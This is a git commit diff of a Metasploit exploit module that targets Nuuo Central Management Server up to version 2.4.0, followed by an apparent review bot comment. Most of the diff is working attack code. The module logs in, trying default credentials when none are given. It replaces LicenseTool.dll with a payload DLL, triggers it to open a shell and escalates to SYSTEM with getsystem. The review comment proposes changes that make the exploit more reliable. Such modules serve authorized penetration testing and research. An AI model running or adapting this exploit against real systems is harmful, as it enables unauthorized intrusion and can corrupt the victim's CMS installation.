Minor updates

exploit:nuuo_cms_fu
GSoC/Meterpreter_Web_Console
Jacob Robles 2019-02-19 05:48:54 -06:00
parent 9070435603
commit 2b71410807
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
1 changed files with 26 additions and 22 deletions


@ -24,6 +24,10 @@ class MetasploitModule < Msf::Exploit::Remote
This module will either use a provided session number (which can be guessed with an auxiliary
module) or attempt to login using a provided username and password - it will also try the
default credentials if nothing is provided.
This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
not execute successfully.
},
'License' => MSF_LICENSE,
'Author' =>
@ -44,57 +48,57 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'Nuuo Central Management Server <= v2.4.0', {} ],
],
'Privileged' => true,
'DisclosureDate' => "Oct 11 2018",
'DisclosureDate' => 'Oct 11 2018',
'DefaultTarget' => 0))
end
def on_new_session(client)
if client.type == "meterpreter"
print_warning("Please wait a bit while we clean up")
if client.type == 'meterpreter'
print_warning('Please wait a bit while we clean up')
client.sys.process.get_processes().each do |proc|
if proc['name'] == "NCS_Server.exe"
if proc['name'] == 'NCS_Server.exe'
client.sys.process.kill(proc['pid'])
sleep 5
Rex.sleep(5)
client.shell_command_token("move /y #{@dll} LicenseTool.dll")
client.sys.process.execute("NCS_Server.exe")
print_good("Successfully restored LicenseTool.dll!")
client.sys.process.execute('NCS_Server.exe')
print_good('Successfully restored LicenseTool.dll!')
end
end
# elevate privs to system (we're already Admin anyway), and we're done!
client.run_cmd("getsystem")
print_good("We should have SYSTEM now, enjoy your shell!")
client.run_cmd('getsystem')
print_good('We should have SYSTEM now, enjoy your shell!')
else
print_error("You are not using meterpreter, so we are unable to restore LicenseTool.dll")
print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll')
print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
print_error("... otherwise the Nuuo CMS installation will be nuked!")
print_good("Anyway, enjoy your shell!")
print_error('... otherwise the Nuuo CMS installation will be nuked!')
print_good('Anyway, enjoy your shell!')
end
end
def exploit
nucs_login
if @nucs_session == nil
fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS")
unless @nucs_session
fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS')
end
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
# and not nuke the CMS installation.
@dll = rand_text_alpha(12)
print_status("Backing up LicenseTool.dll to #{@dll}")
dll_data = nucs_download_file("LicenseTool.dll")
dll_data = nucs_download_file('LicenseTool.dll')
nucs_upload_file(@dll, dll_data)
print_status("Uploading payload...")
nucs_upload_file("LicenseTool.dll", generate_payload_dll)
print_status('Uploading payload...')
nucs_upload_file('LicenseTool.dll', generate_payload_dll)
print_status("Sleeping 15 seconds...")
sleep 15
print_status('Sleeping 15 seconds...')
Rex.sleep(15)
print_status("Sending SENDLICFILE request, shell incoming!")
print_status('Sending SENDLICFILE request, shell incoming!')
license_data = rand_text_alpha(50..350)
nucs_send_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
"Content-Length: " + license_data.length.to_s], license_data)
nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic",
'Content-Length: ' + license_data.length.to_s], license_data)
end
end
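Review bot: In `exploit`, the backup taken at `dll_data = nucs_download_file('LicenseTool.dll')` is never checked before `nucs_upload_file('LicenseTool.dll', generate_payload_dll)` overwrites the real file, so a failed or empty download leads straight to the corrupted-install outcome the module description warns about. Assuming `nucs_download_file` (defined outside this hunk) returns nil or an empty string on failure, I would guard the destructive write with `fail_with(Failure::Unknown, 'Failed to back up LicenseTool.dll, aborting to avoid corrupting the CMS install') if dll_data.nil? || dll_data.empty?` immediately after the download. Similarly, in `on_new_session` the `print_good('Successfully restored LicenseTool.dll!')` is printed without inspecting the result of the `move /y` command, and the `move` also relies on the shell's working directory being the CMS folder, so the success message can be misleading; consider checking the command output before reporting success. The `getsystem` call is a noisy, well-signatured action on the target and might be worth mentioning in the module notes.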